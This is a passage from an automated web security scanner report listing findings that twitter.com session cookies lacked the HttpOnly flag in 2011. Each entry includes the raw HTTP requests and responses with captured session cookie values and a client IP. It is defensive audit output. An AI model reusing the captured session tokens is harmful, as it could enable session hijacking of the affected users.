Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc3MjgzOTAyMzkxMDkxMjoMY3NyZl9pZCIlMzZjNjQyMjZiMjdi%250AYjEyMDg4ZmU0MGQ3MWFlM2M3M2I6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--31a7ec0c01289e70c33472c98a7cbc57bf724c53; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.140. http://twitter.com/malsup/status/30791740717801472

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/30791740717801472

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30791740717801472 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-47255-25269
ETag: "d4aa7ab8b414958eeafd252d48c7544d"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.05744
Content-Type: text/html; charset=utf-8
Content-Length: 13835
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc5MTc0MDcxNzgwMTQ3MjoMY3NyZl9pZCIlM2ViNDhhMTdlMDQx%250AMTNkNjM4ZWNjZjJjNzM1YzRhNGI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--57098155f97d7c28fdd3d7868ba2f1b52affaed0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.141. http://twitter.com/mariamenounos

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /mariamenounos

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mariamenounos HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266001-12668-52676
ETag: "dfd5f78ed0c4ed8b98562bddfee9b7e2"
Last-Modified: Sat, 29 Jan 2011 01:53:21 GMT
X-Runtime: 0.01149
Content-Type: text/html; charset=utf-8
Content-Length: 49303
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.142. http://twitter.com/mattbanks

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /mattbanks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mattbanks HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225020-89730-48319
ETag: "ec0575d0afb2bf3f6fc09ae312d729c0"
Last-Modified: Fri, 28 Jan 2011 14:30:20 GMT
X-Runtime: 0.01604
Content-Type: text/html; charset=utf-8
Content-Length: 50027
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.143. http://twitter.com/mattbanks/status/28168049634844672

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /mattbanks/status/28168049634844672

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mattbanks/status/28168049634844672 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225023-49309-63525
ETag: "2ac504ed19bb0d5737b54925ddf2dbee"
Last-Modified: Fri, 28 Jan 2011 14:30:23 GMT
X-Runtime: 0.06537
Content-Type: text/html; charset=utf-8
Content-Length: 13691
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWF0dGJhbmtz%250AL3N0YXR1cy8yODE2ODA0OTYzNDg0NDY3MjoMY3NyZl9pZCIlMjQzOTBlZDZh%250ANWJhODhmMzZjMTQyNDJjYTViZTE2Y2M6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6%250AB2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--345453cec4138598b9a08c29980df4c39c3aba90; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.144. http://twitter.com/mennovanslooten

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /mennovanslooten

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mennovanslooten HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225070-8349-1627
ETag: "d5a74d3b21022a46e5228042d143d163"
Last-Modified: Fri, 28 Jan 2011 14:31:10 GMT
X-Runtime: 0.01281
Content-Type: text/html; charset=utf-8
Content-Length: 48347
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.145. http://twitter.com/messengerpost

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /messengerpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /messengerpost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225043-32375-15875
ETag: "e9683276160c0ad3462c344153ccbcdb"
Last-Modified: Fri, 28 Jan 2011 14:30:43 GMT
X-Runtime: 0.01196
Content-Type: text/html; charset=utf-8
Content-Length: 50655
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.146. http://twitter.com/miketaylr

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /miketaylr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /miketaylr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225015-365-19064
ETag: "fe6b40f83a3db7f038fdf6a1c2da2712"
Last-Modified: Fri, 28 Jan 2011 14:30:15 GMT
X-Runtime: 0.01247
Content-Type: text/html; charset=utf-8
Content-Length: 50661
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.147. http://twitter.com/miketaylr/status/28450462860574722

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /miketaylr/status/28450462860574722

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /miketaylr/status/28450462860574722 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225015-87669-41148
ETag: "0614e68a07b236446d991d175287ff76"
Last-Modified: Fri, 28 Jan 2011 14:30:15 GMT
X-Runtime: 0.06100
Content-Type: text/html; charset=utf-8
Content-Length: 13700
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWlrZXRheWxy%250AL3N0YXR1cy8yODQ1MDQ2Mjg2MDU3NDcyMjoMY3NyZl9pZCIlODgzNDE0MmFh%250AYjIxNmFlNTQzYjMzMTE1YjIwN2I2OTg6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--7486f8d612e6b798f03b8c042950cee765d57f1e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.148. http://twitter.com/moxiesoft

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /moxiesoft

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /moxiesoft HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:16:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224184-1250-55880
ETag: "c8b3c0b1df873136d3d1cad3c8b419ff"
Last-Modified: Fri, 28 Jan 2011 14:16:24 GMT
X-Runtime: 0.01726
Content-Type: text/html; charset=utf-8
Content-Length: 51386
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296224183777646; path=/; expires=Fri, 04-Feb-11 14:16:23 GMT; domain=.twitter.com
Set-Cookie: guest_id=129622418451783185; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTRmYjYzZDBkM2FhODQ0MWJmMjI2Y2RiMWRmZjM2NDlmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyGj7zC0B--83af79b56916b6955fc5a806bee986cc03de516e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.149. http://twitter.com/onlyjazz

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /onlyjazz

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlyjazz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224920-98437-32805
ETag: "a870c25d2bf45fd1f02dca10a6c09b7f"
Last-Modified: Fri, 28 Jan 2011 14:28:40 GMT
X-Runtime: 0.00899
Content-Type: text/html; charset=utf-8
Content-Length: 49524
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.150. http://twitter.com/onlyjazz/status/29924505002446849

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /onlyjazz/status/29924505002446849

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlyjazz/status/29924505002446849 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224923-90834-17466
ETag: "5608c66aeb64567924807b23b0514ade"
Last-Modified: Fri, 28 Jan 2011 14:28:43 GMT
X-Runtime: 0.05594
Content-Type: text/html; charset=utf-8
Content-Length: 13806
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vb25seWphenov%250Ac3RhdHVzLzI5OTI0NTA1MDAyNDQ2ODQ5Ogxjc3JmX2lkIiVjZGY1NzI3MTNk%250ANzEzZDVmYzU1N2MyZWJiOTIxMWNhMzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMw%250AYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07w%250AzC0B--92541950a44bd04792a3b27273e15bc7882e2cca; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

